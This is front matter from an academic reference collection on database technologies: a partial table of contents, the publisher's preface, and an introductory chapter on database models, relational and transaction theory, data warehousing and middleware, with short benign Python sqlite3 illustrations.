Chapter 8.5. Looking for Information in Fuzzy Relational Databases Accessible Via Web ............ 2448 Carmen Martínez-Cruz, University of Jaén, Spain Ignacio José Blanco, University of Granada, Spain M. Amparo Vila, University of Granada, Spain Chapter 8.6. Integrating Heterogeneous Data Sources in the Web ................................................... 2472 Angelo Brayner, University of Fortaleza, Brazil Marcelo Meirelles, University of Fortaleza, Brazil José de Aguiar Moraes Filho, University of Fortaleza, Brazil Chapter 8.7. Reverse Engineering from an XML Document into an Extended DTD Graph ........... 2489 Herbert Shiu, City University of Hong Kong, Hong Kong Joseph Fong, City University of Hong Kong, Hong Kong Chapter 8.8. Evaluating XML-Extended OLAP Queries Based on Physical Algebra ..................... 2510 Xuepeng Yin, Aalborg University, Denmark Torben Bach Pedersen, Aalborg University, Denmark Chapter 8.9. Vertical Fragmentation in Databases Using Data-Mining Technique .......................... 2543 Narasimhaiah Gorla, American University of Sharjah, UAE Pang Wing Yan Betty, Hong Kong Polytechnic University, Hong Kong Chapter 8.10. Control-Based Database Tuning Under Dynamic Workloads.................................... 2564 Yi-Cheng Tu, University of South Florida, USA Gang Ding, Olympus Communication Technology of America, Inc., USA Chapter 8.11. Adoption, Improvement, and Disruption: Predicting the Impact of Open Source Applications in Enterprise Software Markets ......................................................... 2572 Michael Brydon, Simon Fraser University, Canada Aidan R. Vining, Simon Fraser University, Canada Chapter 8.12. 3-D Virtual Worlds in Education: Applications, Benefits, Issues, and Opportunities.............................................................................................................................. 2595 Brenda Eschenbrenner, University of Nebraska-Lincoln, USA Fiona Fui-Hoon Nah, University of Nebraska-Lincoln, USA Keng Siau, University of Nebraska-Lincoln, USA Chapter 8.13. Legal Protection of the Web Page as a Database ....................................................... 2616 Davide Mula, LUISS Guido Carli, Italy Mirko Luca Lobina, University of Cagliari, Italy Chapter 8.14. Deterministic Motif Mining in Protein Databases ..................................................... 2632 Pedro Gabriel Ferreira, Universidade do Minho, Portugal Paulo Jorge Azevedo, Universidade do Minho, Portugal
Chapter 8.15. Mining Allocating Patterns in Investment Portfolios................................................. 2657 Yanbo J. Wang, University of Liverpool, UK Xinwei Zheng, University of Durham, UK Frans Coenen, University of Liverpool, UK Chapter 8.16. Introducing Elasticity for Spatial Knowledge Management ...................................... 2685 David A. Gadish, California State University Los Angeles, USA
Preface
The field of database technology has become vitally important to information and technical science as the world turns more and more frequently to technology for the storage and interpretation of intangible media. As the information age booms, so does the need for cutting-edge research and technology with the purpose of understanding, maintaining, and improving database management. Database architecture, data mining, and data warehousing are each vitally important areas in which practitioners, researchers, scholars, and academics have continued to work to develop the most elegant and efficient database technologies. During this period of time, numerous researchers and academicians have developed a variety of techniques, methodologies, and measurement tools that have allowed them to develop, deliver, and at the same time evaluate the effectiveness of several areas of database technology. The critical importance of these technologies and methodologies continues to inspire an abundance of new, state-of-the-art literature related to all aspects of this discipline, allowing researchers and practicing educators to learn about the latest advances in the field of database technologies. Due to the constant search for improved methods and technologies, it is a challenge for researchers and experts in this discipline to take in the volume of information available on these innovations, and to develop and deliver more novel methodologies and techniques utilizing new technological inventions.

This collection endeavors to provide the most comprehensive, in-depth, and recent coverage of all issues related to this important field, as well as to offer a single reference source on all conceptual, methodological, technical, and managerial issues, opportunities, future challenges, and emerging trends related to database technologies. Information Science Reference is pleased to offer a four-volume reference collection on this foundational discipline, in order to empower students, researchers, academicians, and practitioners with a comprehensive understanding of the most critical areas within this field of study. This collection, entitled “Database Technologies: Concepts, Methodologies, Tools, and Applications,” is organized in eight (8) distinct sections, providing the most wide-ranging coverage of topics such as: (1) Fundamental Concepts and Theories; (2) Development and Design Methodologies; (3) Tools and Technologies; (4) Utilization and Application; (5) Organizational and Social Implications; (6) Managerial Impact; (7) Critical Issues; and (8) Emerging Trends. The following provides a summary of what is covered in each section of this multi-volume reference collection:

Section I, Fundamental Concepts and Theories, serves as a foundation for this extensive reference tool by addressing crucial theories essential to the understanding of database technologies. Chapters such as “A Generalized Comparison of Open Source and Commercial Database Management Systems” by Theodoros Evdoridis and Theodoros Tzouramanis, as well as “Highly Available Database Management Systems” by Wenbing Zhao, provide an excellent framework in which to understand the fundamental concepts of database technologies. “Conceptual Modeling Solutions for the Data Warehouse” by Stefano Rizzi offers illuminating insight into the conceptual framework of data warehouse design, while chapters
such as “Approaches to Semantics in Knowledge Management” by Cristiano Fugazza, Stefano David, Anna Montesanto, and Cesare Rocchi address the various approaches to semantics and the challenges of creating a system with its own unique semantics. With over 25 chapters comprising this foundational section, the reader can choose from a compendium of expert research on the elemental theories underscoring the use of database technologies.

Section II, Development and Design Methodologies, presents in-depth coverage of conceptual architecture frameworks to provide the reader with a comprehensive understanding of the emerging technological developments within the field of database technologies. “Design of a Data Model for Social Network Applications” by Susanta Mitra, Aditya Bagchi, and A. K. Bandyopadhyay offers a data model for storage and retrieval of social network information, while “Database Design Based on B” by Elvira Locuratolo provides a detailed look at the integration of the ASSO feature in B. From broad examinations to specific discussions on database technologies such as Efrem Mallach’s “A Database Project in a Small Company (or How the Real World Doesn’t Always Follow the Book),” the research found within this section spans the discipline while also offering detailed, specific discussions. From basic designs to abstract development, chapters such as “Web Data Warehousing Convergence: From Schematic to Systematic” by D. Xuan Le, J. Wenny Rahayu, and David Taniar and “Designing Information Systems Capabilities to Create Business Value: A Theoretical Conceptualization of the Role of Flexibility and Integration” by Christoph Schlueter Langdon serve to expand the reaches of development and design technologies within the database technology community. This section includes over 20 contributions from researchers throughout the world on the topic of database technologies within the information science and technology field.

Section III, Tools and Technologies, presents extensive coverage of various tools and technologies available in the field of database technology that practitioners and academicians alike can utilize to develop different techniques. Chapters such as Emmanuel Udoh’s “Open Source Database Technologies” offer a look at the open source database technology available and discuss its use in comparison with the popular closed source databases. A specific data mining algorithm is looked at in chapters like “MILPRIT*: A Constraint-Based Algorithm for Mining Temporal Relational Patterns” by Sandra de Amo, Waldecir P. Junior, and Arnaud Giacometti. It is through these rigorously researched chapters that the reader is provided with countless examples of the up-and-coming tools and technologies emerging from database technology. With more than 20 chapters, this section offers a broad treatment of some of the many tools and technologies within the database technology community.

Section IV, Utilization and Application, discusses a variety of applications and opportunities available that can be considered by practitioners in developing viable and effective database management systems. This section includes more than 25 chapters, such as “Enhancing UML Models: A Domain Analysis Approach” by Iris Reinhartz-Berger and Arnon Sturm, which addresses the problems of completeness and correctness within the UML modeling language by advocating the use of application-based domain modeling. Additional chapters such as Christopher B. Mayer and K. 
Selçuk Candan’s “Large-Scale ASP Replication of Database-Driven Portals” discuss the ultimate necessity for logic and database replication in web portals to keep up with increasing user demand. Also considered in this section are the architecture and characteristics of mobile transactions from the database perspective within Z. Abdul-Mehdi, A. Mamat, H. Ibrahim, and M. Dirs’ chapter, “Transaction Management in Mobile Databases.” Contributions included in this section provide excellent coverage of the use of database technologies and how they can be applied to the various types of database use.

Section V, Organizational and Social Implications, includes a wide range of research pertaining to the social and organizational impact of database technologies. In this section, you will find chapters such as Robert A. Bartsch’s “Misuse of Online Databases for Literature Searches.” This study describes the
use and misuse of online library databases and attempts to help lecturers structure their assignments in such a way as to avoid misuses by increasing students’ level of information literacy. In “Fine-Grained Data Security in Virtual Organizations” by Harith Indraratne and Gábor Hosszú, the concept of controlling the information available to a user down to the row of data provided by using fine-grained access control is thoroughly discussed. The increased importance of privacy protection combined with the demand for accessibility of information is discussed in George T. Duncan and Stephen F. Roehrig’s chapter “Reconciling Information Privacy and Information Access in a Globalized Technology Society.”

Section VI, Managerial Impact, presents contemporary coverage of database technologies, which is more specifically related to the corporate and managerial utilization of database management systems, and how these technologies can be facilitated within organizations. Chapters include important comparisons between business technologies, such as Emmanuel Udoh’s “Database Integration in the Grid Infrastructure,” which discusses Oracle 10g and argues that businesses will embrace enterprise database grids for their various beneficial attributes. The availability of databases for online database searches by their users is discussed in “Database High Availability: An Extended Survey” by Moh’d A. Radaideh and Hayder Al-Ameed. Equally as crucial are chapters such as “Empirical Assessment of Factors Influencing Success of Enterprise Resource Planning Implementations” by Fiona Fui-Hoon Nah, Zahidul Islam, and Mathew Tan, which discusses key factors that influence the success or failure of ERPs.

Section VII, Critical Issues, contains 25 chapters addressing issues such as improving storage for semantic models, improving the accuracy of queries to databases with integrity constraints, and the security of databases containing sensitive information. Within the chapters, the reader is presented with an in-depth analysis of many of the current and relevant issues within this fundamental field of study. The section includes Russel Pears and Bryan Houliston’s “Optimization of Multidimensional Aggregates in Data Warehouses,” which discusses the use of the prime factor scheme to compress data within a warehouse and compares it with the Haar wavelet. The particular idiosyncrasies involved in a multimedia database, and a proposed data model to answer those unique functionalities, are discussed in “Managing Uncertainties in Image Databases” by Antonio Picariello and Maria Luisa Sapino. These and the other chapters in this section combine to provide a wealth of debate on a variety of theoretical topics as they relate to database technologies.

The concluding section of this authoritative reference tool, Emerging Trends, highlights research potential within the field of database technology, while exploring new areas of study for the advancement of the discipline. Introducing this section is a chapter entitled “From Databases to Ontologies” by Guntis Barzdins, Janis Barzdins, and Karlis Cerans, which presents the UML profile for OWL as a bridge between legacy relational databases and OWL ontologies. Providing a view of a generalized measurement ontology meant to interact with the semantic web is “A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web” by Henry M. Kim, Arijit Sengupta, Mark S. Fox, and Mehmet Dalkilic. 
This chapter argues that these generalized ontologies are needed as a first step toward creating more detailed domain-specific ontologies. Concluding this section is an article by David A. Gadish called “Introducing Elasticity for Spatial Knowledge Management.” This chapter discusses the property of elasticity as it relates to spatial databases and the management of inconsistencies between related spatial data. Several areas of emerging trends and suggestions for future research within this constantly evolving discipline are found in these 16 chapters concluding this exhaustive multi-volume set.

Although the primary organization of the contents in this multi-volume set is based on its eight sections, offering a progression of coverage of the important concepts, methodologies, technologies, applications, social issues, and emerging trends, the reader can also identify specific contents by utilizing the extensive indexing system listed at the end of each volume. Furthermore, to ensure that the scholar, researcher
and educator have access to the entire contents of this multi-volume set as well as additional coverage that could not be included in the print version of this publication, the publisher will provide unlimited multi-user electronic access to the online aggregated database of this collection for the life of the edition, free of charge when a library purchases a print copy. This aggregated database provides far more contents than what can be included in the print version, in addition to continual updates. This unlimited access, coupled with the continuous updates to the database, ensures that the most current research is accessible to knowledge seekers.

Database technology is a discipline that will always be critical to the information technology field, as its subject matter is a foundational piece of computing technologies. The use of databases for information storage and analysis will only continue to grow as the demand for greater quantities of knowledge and faster database systems increases. Practitioners in the field, along with researchers and scholars, will continue to look for ways to improve the retrieval and interpretation of information as well as its format and storage capabilities. As the field continues to grow, develop, and improve, an abundance of new and innovative research on database management systems and their various implications and uses will continue to emerge. The diverse and comprehensive coverage of database technologies in this four-volume authoritative publication will contribute to a better understanding of all topics, research, and discoveries in this developing, significant field of study. Furthermore, the contributions included in this multi-volume collection series will be instrumental in the expansion of the body of knowledge in this enormous field, resulting in a greater understanding of the fundamentals while fueling the research initiatives in emerging fields.

We at Information Science Reference, along with the editor of this collection, hope that this multi-volume collection will become instrumental in the expansion of the discipline and will promote the continued growth of database technologies.
Database Technologies:
Concepts, Methodologies, Tools, and Applications John Erickson University of Nebraska–Omaha, USA
INTRODUCTION

Since their development more than 45 years ago, databases have played an ever-larger role not only in how businesses operate, but also in the structure of business itself. The saturation rate of databases and database technologies into business has reached nearly 100 percent, and most medium and large businesses could not even operate today without a database. In addition, many small businesses, such as those that buy and sell on eBay, depend heavily upon databases, even though the databases may not be directly used by the businesses themselves. In a time when many businesses are moving (or have already moved) to the Web, the integration of their databases with Web technologies has assumed a critical role in gaining or maintaining the elusive competitive advantage.

The editors of this series in general, and of this volume specifically, have assembled what they consider to be the best materials contained in other IGI books, research journals, case studies, and general encyclopedias on the subject of databases, and presented them here to serve as a fully inclusive and comprehensive one-stop reference source. This volume presents coverage in five separate but related areas: Fundamental Concepts and Theories, Tools and Technologies, Application and Utilization, Organizational and Managerial Issues, and Emerging Trends. In that context, this first chapter will briefly introduce each area and provide a basis for the subsequent chapter discussions.
FUNDAMENTAL CONCEPTS AND THEORIES

Section 1, Fundamental Concepts and Theories, presents a common definition of a database and its related components. The primary database models are then presented, with some historical background on each. Finally, Section 2 briefly explores a select number of the theories underlying the relational model.
Database Definition and Components

A database can be defined as a “self-describing collection of integrated records” (Kroenke, 1995). This definition is one of the more succinct and thorough ones, but it is not necessarily standard, nor is it unique, although most distinct definitions have much commonality. An informal Google search of the words “database definition” returned 23 distinct results (Google, 2008). This leads to basic problems for beginners to the database environment. Terminology is also used interchangeably for some specific elements of a database, causing even more confusion. However, a database is basically a way to capture, store, organize, and present data as information, typically for business, although many other uses for databases and database technologies have emerged since formally defined databases were created.

A formal database is comprised of several elements. First, the data itself is housed in data structures usually called files or tables. Second, a piece (or pieces) of software called the DBMS (Database Management System) handles several critical tasks, such as how the data is managed (input, processed, output, and stored), basic security, and replication/backup, among others. Finally, another piece of software, the user interface application, handles how users interact with the database. Some database products have merged the DBMS with the user interface, or allow creation of a custom interface. Most textbooks on database design include three components as necessary to formally constitute a database management system: a data definition language (DDL), a data manipulation language (DML), and a data dictionary. The third component, the data dictionary, meets the definitional requirement that a database be self-describing, that is, that it contain a metadata element. For that reason, spreadsheet applications (e.g., Excel, Lotus 1-2-3) are not considered to be databases, although such programs may support database operations or be used to upload to or download from a database. The data dictionary describes each piece of data that is stored in a table, including its name, data type (such as text or numeric), length, and where it occurs in a table (or tables), among other descriptive attributes of the data element.

In most modern businesses, data captured from operations via Transaction Processing Systems (TPS) is almost universally structured and deposited into a database for presentation as presumably actionable information to managers at the operational, management, and strategic levels of the organization. Historically, databases were seen as repositories of organizational data and information, and did not include extensive analytic tools other than query creation. That has changed considerably with the advent of data warehouses and data mining.

Finally, a relational database will not “work” without relationships. Relationships are created through the process of normalization, and represent the very core of why the relational model is so successful. A fully normalized database will minimize the redundancy of data stored, usually resulting in the key field from one table being stored in another table as a foreign key. The storage of foreign keys in a table depicts the relationship between the two tables in question, and allows queries based on relational algebra to work. The depiction of the arrangement of the data structures and the relationships between them most often takes the form of an ERD or EERD (Entity-Relationship Diagram or Enhanced Entity-Relationship Diagram). 
The E-R model, first described in detail by Chen (1976), is most often used as a modeling tool to help design the database. There are several versions of the E-R model in existence, and there appears to be no completely agreed-upon version as the standard. For example, Batra, Hoffer, and Bostrom (1988) were among the first to research the use of Enhanced E-R diagramming as a means to include object-oriented structures, such as subtypes/supertypes and generalization/specialization, in database modeling. Finally, a combined DDL and DML, almost always SQL (Structured Query Language) in practice, is used to create the data structures and define the elements in the data dictionary. SQL is recognized as a standard, if not the standard, language used in relational databases. Soon after Codd (1970) published his defining relational database model paper, IBM began developing an application that would implement a database using the relational model. The project included early versions of the query language, and ended with published standards in the late 1970s. The first commercial relational database product released was Oracle in 1979, which also used SQL as the query language.
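To make these components concrete, the following is a minimal sketch (not drawn from the text) using Python's built-in sqlite3 module. The table and column names are invented for illustration only; the point is to show the DDL creating related structures, the DML manipulating and joining them through a foreign key, and the catalog acting as a rudimentary data dictionary that makes the database self-describing.

```python
# Minimal sketch: DDL, DML, a foreign-key relationship, and the self-describing catalog.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("PRAGMA foreign_keys = ON")  # enforce the declared relationship

# DDL: two entity classes and the foreign key that depicts their relationship
conn.executescript("""
CREATE TABLE department (
    dept_id   INTEGER PRIMARY KEY,
    dept_name TEXT NOT NULL
);
CREATE TABLE student (
    student_id INTEGER PRIMARY KEY,
    last_name  TEXT NOT NULL,
    dept_id    INTEGER REFERENCES department(dept_id)  -- foreign key
);
""")

# DML: insert rows and query across the relationship (a relational-algebra join)
conn.execute("INSERT INTO department VALUES (1, 'Information Systems')")
conn.execute("INSERT INTO student VALUES (100, 'Codd', 1)")
rows = conn.execute("""
    SELECT s.last_name, d.dept_name
    FROM student s JOIN department d ON s.dept_id = d.dept_id
""").fetchall()
print(rows)  # [('Codd', 'Information Systems')]

# Data dictionary: the database describes its own structure (metadata)
print(conn.execute("SELECT name, sql FROM sqlite_master WHERE type='table'").fetchall())
```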
Database Models and Theories

Database Models

The Relational, Hierarchical, and Network Models

By far the most prevalent database design in use today is based on the relational model. The relational model was first described and detailed in 1970 by E. F. Codd. The relational model arose from a specific area of mathematics called relational algebra. Codd showed how a relational data model could be used to define and structure large databases for organizations. The relational model supplanted the more common (at the time) hierarchical and network models. IBM and North American Rockwell were the primary developers of the hierarchical and network models in the mid-to-late 1960s, beginning with the massive data storage requirements and problems posed by the Apollo space program (Kroenke, 1995). The initial problems with the relational model were its processing, memory, and storage requirements, coupled with a lack of DBMSs and front-end applications created to use it. Even though the relational model preceded the desktop computer by almost a decade, the model taxed most mainframes to nearly the limits of their capacity, and therefore the relational model did not gain much acceptance or practical application until the early to mid 1980s. Since that time, however, the relational model has dominated the database market with little challenge from other approaches.

The Object-Oriented Model

Object-oriented programming languages have arguably become the most popular means of creating applications in the current environment. Data and procedures (often seen as representing processes) are combined into objects in the OO (object-oriented) paradigm. This approach allows creation of reusable pieces of code and use of the same piece of code in multiple places within a program (e.g., DLL, or dynamic link library, files in MS Windows®). While programming languages such as C++, Java, VB.NET, and many others have become popular, and some are deeply entrenched in Internet applications, many businesses and the underlying relational data model are still for the most part transactionally or process based. Out of this situation sprang the OO database model, based on the OO processing paradigm rather than the transactional paradigm. Some of the limitations of the relational model are addressed, again arguably, by the OO model. These limitations include handling of complex objects (voice or video as storage "data" nodes), limited support for general data types, performance degradation when a query needs a large number of tables, the process orientation versus the OO orientation, and limited or no support for various versions of the same object (Watson, 1999). The OO database model supports many of the concepts and ideas that form the basis of the OO paradigm, and also links very tightly with the OO programming languages. The first ODBMS standard, ODMG 1.0, was released in 1993 (ODBMS.org, 2008). According to the same site, sales of OODBMS products peaked in about 2000 and have decreased steadily since that time. The ODMG released a final standard in 2001 and disbanded shortly thereafter. Based upon these occurrences, at this point it seems unlikely that the OODBMS model will supplant the relational model anytime soon.
The Object-Relational Model

The basic dissimilarities and tensions between the now traditional relational data model and the more recent OO model have given rise to a hybrid type of database model: the object-relational model. The object-relational model begins with the relational model and query schemas, and modifies them to include support for object-oriented elements such as objects, classes, and inheritance. It is common for current ORDBs (object-relational databases) to include facilities that allow users to define their own data types, called UDTs (user-defined data types). This allows definition and use of objects and classes in what is otherwise essentially a relational database (RDB). In this way, ORDBs attempt to bridge the gap between OODBs and RDBs. The object-relational model has made some advances in a world now dominated by the OO paradigm and programming languages, and should become more commonly used in the future, although that is of course somewhat dependent upon user/organizational acceptance and application and tool development.
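In a full ORDBMS, UDTs are typically declared in the SQL dialect itself (for example, via a CREATE TYPE statement in products that support object-relational features). As a loose, application-level analogy only, and not the ORDB mechanism the text describes, the sketch below uses Python's sqlite3 adapters and converters to round-trip a custom class through a column; the Point class and table names are hypothetical.

```python
# Loose analogy to a user-defined type: a custom Python class stored in, and
# reconstructed from, a column whose declared type matches a registered converter.
import json
import sqlite3

class Point:
    def __init__(self, x, y):
        self.x, self.y = x, y
    def __repr__(self):
        return f"Point({self.x}, {self.y})"

# how to store the object (adapter) and how to rebuild it (converter)
sqlite3.register_adapter(Point, lambda p: json.dumps([p.x, p.y]))
sqlite3.register_converter("point", lambda blob: Point(*json.loads(blob)))

conn = sqlite3.connect(":memory:", detect_types=sqlite3.PARSE_DECLTYPES)
conn.execute("CREATE TABLE site (site_id INTEGER PRIMARY KEY, location point)")
conn.execute("INSERT INTO site (site_id, location) VALUES (?, ?)", (1, Point(1.5, 2.5)))

print(conn.execute("SELECT location FROM site").fetchone()[0])  # Point(1.5, 2.5)
```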
Theories Underlying the Database Area

Many theories underlie the database area, and could comprise several volumes of text in themselves. Therefore, this section of the chapter will briefly highlight a select few theories. Early thought on computer systems design and architecture in general emerged roughly from cognitive psychological models of human information processing, or in other words, how the biological brain operates. It made sense then to try to build computer and information systems processing around those models. The Newell-Simon Model is first discussed as an underpinning for the reasoning behind why information systems and databases are developed. Next, Database Theory is presented. Database Theory generally falls into two separate branches: Relational Database Theory and Transaction Theory. Each of those areas has sub-areas of research, with Dependency Theory, Universal Relations Theory, and Acyclic Hypergraph Theory as underlying research streams for Relational Database Theory, and Atomicity of Transactions, Consistency of Replicated Data, and Reliability in the Face of Hardware and Software Failures as the foundations of Transaction Theory (Ullman, 1987).

The Newell-Simon Model

Simon and Newell developed their idea of how humans process information in the late 1960s and early 1970s. They proposed that humans deal with information by means of a processor that is connected to memory that includes both data and processes (Newell & Simon, 1972). They further proposed that in order to conduct operations, the processor recalls data and processes from memory. Of course, human processing has some well-known limitations in terms of both processing and memory. For example, Miller (1956) found that humans process information in chunks and can hold and operate on between 5 and 9 chunks of data simultaneously. Limitations in human memory and processing are two primary drivers of technological development, since using technology, we can build systems to augment and surpass what we are able to accomplish through manual calculations and paper-based storage systems. Newell and Simon's model can be used to help understand how decisions are made in organizations, and from that understanding, information about how best to design and implement information systems and databases can be deduced. An example would be designing user interfaces. The systems analysts examine the specific roles and tasks assigned to each distinct job in an organization. They can then create the user screens around the results of that analysis, providing exactly the data and information each user needs to execute their assigned job, but simultaneously not providing too much or unnecessary
data or information. Too much information, known as information overload, as well as other security and privacy issues, are critical elements in information system and database design. Overall, the Newell-Simon model does not really address database development or production per se, but rather speaks to how and why information systems in general are developed.

The Theory of Relational Databases

As previously noted, Relational Database Theory coalesced in 1970 with Codd's paradigm-shifting paper. But before that, in the early 1960s, Bosak et al. (1962) had already completed some of the theoretical groundwork that provided a springboard for Codd and later database theoreticians, by developing a relational algebra that detailed operations on single files. Other mathematical theorists quickly followed and expanded those ideas, leading ultimately to Codd's creation (Kuhns, 1967; Childs, 1968; DiPaola, 1969; Fillat & Kraning, 1970). Building on Codd, Armstrong (1974) developed a more rigorously sound theoretical framework. While many other researchers took up the theory torch from that point, one notable mention is Bernstein, who both alone and with other researchers formalized the idea of normalization. Most importantly, his work with Beeri (1979) launched his interactions with other interested researchers in that area, which fueled even more research into normalization and related topics. These research efforts led to enhancements in the area of Dependency Theory, with Fagin (1977) clarifying the problems and solutions related to multi-valued dependencies. Fagin's efforts were only the beginning of the drive to understand the issues related to normalization. Fagin followed with theoretical framework research in the areas of Universal Relations Theory (Fagin, Mendelzon, & Ullman, 1982) and Acyclic Hypergraph Theory (Fagin, 1983).

Transaction Theory

Transaction Theory deals in general with managing concurrency in database transactions. What this really means is how databases can be designed to handle situations in which two or more users attempt to modify the same record in a table at the same point in time. Stearns, Lewis, and Rosenkrantz (1976) provided some seminal research into concurrency, upon which much of the later work was based. One later effort (Hadzilacos, 1988) went to great lengths to formally and rigorously prove many of the previously proposed, but unsubstantiated, ideas of a Reliability Theory for database concurrency. Transaction Theory and its sub-genres of research, and Relational Database Theory, with its related research specialties, have allowed the relational database model to dominate the database industry for the past 25 years, and though a combining of the relational model with the OO database model has become popular recently, the relational model seems likely to remain the best choice for the foreseeable future.
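As a minimal sketch of what transaction management buys in practice, the example below (not from the text; table and column names are invented) shows atomicity: either both updates of a transfer commit, or the whole transfer rolls back and the data stays consistent.

```python
# Minimal sketch of transaction atomicity using Python's sqlite3 module.
import sqlite3

conn = sqlite3.connect(":memory:", isolation_level=None)  # manage transactions explicitly
conn.executescript("""
CREATE TABLE account (acct_id INTEGER PRIMARY KEY,
                      balance INTEGER NOT NULL CHECK (balance >= 0));
INSERT INTO account VALUES (1, 100), (2, 50);
""")

def transfer(amount, src, dst):
    try:
        conn.execute("BEGIN IMMEDIATE")  # take a write lock before touching the rows
        conn.execute("UPDATE account SET balance = balance - ? WHERE acct_id = ?", (amount, src))
        conn.execute("UPDATE account SET balance = balance + ? WHERE acct_id = ?", (amount, dst))
        conn.execute("COMMIT")
    except sqlite3.Error:
        conn.execute("ROLLBACK")  # undo the partial update, leaving the data consistent

transfer(30, 1, 2)    # succeeds: balances become 70 and 80
transfer(500, 1, 2)   # violates the CHECK constraint, so the whole transfer rolls back
print(conn.execute("SELECT * FROM account ORDER BY acct_id").fetchall())  # [(1, 70), (2, 80)]
```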
TOOLS AND TECHNOLOGIES

Database tools and technologies include data warehouses and data mining. These two, more than many of the other technologies, have made a huge leap possible for the analytic side of the database arena. Another area that has impacted database development substantially is that of the Web. Electronic business and electronic commerce have exploded into a primary distribution channel for many companies and organizations. Many tools and technologies that have been at the forefront of development are related to middleware. Middleware is typically software that resides between a data store on one side and a different, and usually incompatible, application where the data is captured or collected on the other. Examples of technologies in this category would have to include XML (Extensible Markup Language), Java, CORBA (Common Object Request Broker Architecture), SOAP (Simple Object Access Protocol), and other similar languages, architectures, or protocols. Section 3 will first cover data warehouses and data mining, followed by a brief discussion of middleware. The section will conclude with an examination of the effect of the Web upon database development.
Data Warehouses

Once the relational data model took over the database scene and relational databases went into production, decision makers in organizations realized the value of the data and information contained in the database. They knew that now they would not have to manually search through dated reams of paper or "flat" computer files to locate actionable items critical for their decision-making needs. However, accessing the data in the database for analysis comes at a premium for the production responsiveness of the database. A database can be seen as a dynamic entity that changes regularly, if not almost continuously, during production, as the company uses it to capture data from operational transactions and processes. If processing time is degraded because of complex analyses, then users and ultimately customers are likely to be negatively impacted. This seems to be in direct opposition to the goal of enhancing the customers' experience, and brings to light what could be said to be a paradox of databases. A solution to the problem was identified quite early on in the race to adopt relational databases: why not create a static snapshot of the database, of what it "looked like" at a given point in time? Thus was born the data warehouse: a series of snapshots in time of the state of the database. With the production database separated from the warehouse, business analysts could execute their queries and conduct their statistical procedures at their leisure. However, more was needed. Analysts soon noted that the normalized data found in a database was often difficult to understand, so they proposed that a data warehouse contain a component that could denormalize that data, so that it would make more sense to the typical user. Next, decision makers thought that external data, coupled with the internal data of a database and data warehouse, would provide the so-called icing on the data cake. Finally, coupling the data warehouse with CRM (Customer Relationship Management), SCM (Supply Chain Management), ERP (Enterprise Resource Planning), and KM (Knowledge Management) tools added the most recent touches to the data warehouse environment (Cunningham, Song, & Chen, 2006; Nilakanta, Miller, & Zhu, 2006). Most data warehouses contain a fairly standard component complement that includes, at a minimum, a set (or sets) of internal data sources, one or more external data sources, an extraction and transform facility, a directory of services provided, a set of analytic tools, and a user interface (Laudon & Laudon, 2007). Inmon and Hackathorn (1994) offered the following as a formal definition of a data warehouse: "…A subject-oriented, integrated, non-volatile collection of data used in support of management decision making processes." Data warehousing has taken a firm hold in business, with more than 90% of larger companies claiming to have and use a data warehouse by as early as the late 1990s (McFadden, Hoffer, & Prescott, 1999). By the early 1990s, many of the technologies and tools were in place for data warehouse development and deployment, but the adoption rate at that time was relatively slow because of the prohibitive costs. As the decade came to a close, the costs of the technologies and of storage dropped significantly, and the idea of implementing a data warehouse became much more attractive. Then, as a critical mass of companies adopted data warehousing, it became in the last years of the current decade a competitive necessity rather than a competitive advantage for many organizations.
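The core idea of extracting a denormalized, point-in-time snapshot out of normalized operational tables can be sketched as follows; the example is illustrative only (all table and column names are invented) and uses Python's sqlite3 module rather than any particular warehouse product.

```python
# Minimal sketch: copy a denormalized snapshot out of the operational tables so
# analysts can query it without touching production.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
-- normalized operational tables
CREATE TABLE product (product_id INTEGER PRIMARY KEY, category TEXT);
CREATE TABLE sale (sale_id INTEGER PRIMARY KEY,
                   product_id INTEGER REFERENCES product,
                   sale_date TEXT, amount REAL);
INSERT INTO product VALUES (1, 'Books'), (2, 'Music');
INSERT INTO sale VALUES (10, 1, '2008-06-01', 25.0), (11, 2, '2008-06-02', 40.0),
                        (12, 1, '2008-06-03', 15.0);

-- denormalized snapshot: the extract/transform step flattens the join
CREATE TABLE sales_snapshot AS
SELECT s.sale_date, p.category, s.amount
FROM sale s JOIN product p ON s.product_id = p.product_id;
""")

# analysts query the snapshot at their leisure (here, revenue by category)
print(conn.execute("""
    SELECT category, SUM(amount) FROM sales_snapshot
    GROUP BY category ORDER BY category
""").fetchall())  # [('Books', 40.0), ('Music', 40.0)]
```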
Middleware

A necessary constraint for database design, development, implementation, and operations is that the data and data structures be isolated from the users, to prevent security problems, inadvertent changes to or deletion of data and the underlying structures, and other issues. This problem becomes more critical as many businesses move to engage in electronic commerce or mobile commerce. DBMS (Database Management System) software has been the traditional catch-all name for applications that create this necessary separation of data and users. Some, perhaps even many or most, DBMS packages are integrated to a large extent with the database itself. There are benefits to this approach in that the same company that created the database also created the DBMS, and that implies much interoperability. However, as businesses change to meet new consumer demands, they are faced with a set of problems involving their database. First, how stable are the data and data structures in the database? If proper design principles were followed during the original development, the data and data structures should be relatively stable. If not, then the database itself might need redesign, which means a very large investment in time and other resources for the business. The second problem can be the more troublesome for many organizations: that of the obsolescence of the DBMS. In other words, as time passes, the security, queries, and data sources feeding the database will likely change, and if the DBMS cannot support the changes required of it, the business will find itself looking for a solution. If the database itself is stable, as previously discussed, then there is often no need to start from scratch; rather, implementation of a new DBMS or similar type of application to replace the old DBMS can be a valid solution. The solution often involves an overhaul of the DBMS or implementation of a new DBMS. In addition, if the data sources have changed, for example in a new e-commerce application, then the data collected on a Web site needs to be formatted and structured so that it will match with the appropriate data elements in the database. In any of these cases, except that of a completely new database, software needs to be written that either replaces or overlays the existing DBMS. The new software that performs this connection function is often called middleware, since it sits between, or connects, the user and the database itself. XML (Extensible Markup Language) is a markup language that has emerged as one of the enablers of e-commerce and e-business. One of the original languages used for Web page creation was HTML (Hypertext Markup Language), and at that point in time, XML did not exist. Both HTML and XML are derived from a parent language, SGML (Standard Generalized Markup Language). The languages are tag-based, and in HTML the tags were all predefined in the language syntax; extensions to allow user-defined tags were minimal or non-existent for the most part. What this meant to companies that wanted to do business via their Web sites was that the ways to capture data were cumbersome and inefficient at best, and almost unworkable at worst. As a result, XML was designed to allow users to define their own tags, which in turn meant that applications could be created that collected data on the Web pages and deposited it directly into the database. Much research has been done with regard to integrating XML data into databases and, further, into data warehouses.
